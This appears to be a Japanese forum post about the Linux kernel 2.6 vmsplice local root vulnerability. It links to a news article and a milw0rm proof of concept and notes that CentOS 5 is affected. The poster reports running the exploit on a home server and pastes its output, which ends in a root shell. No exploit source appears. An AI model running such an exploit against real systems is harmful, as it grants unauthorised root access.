08/02/12 13:45:04 e3GIM9n0
Linuxカーネル2.6系にroot権限を奪われる脆弱性
URLリンク(www.atmarkit.co.jp)
実証コード
URLリンク(www.milw0rm.com)
CentOS も5系だとバッチリ該当しますね。
自宅サーバで試してみたらあっさりroot になれて笑った。
[user@hoge ~]$ ./a.out
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f0b000 .. 0xb7f3d000
[+] root
[root@hoge ~]#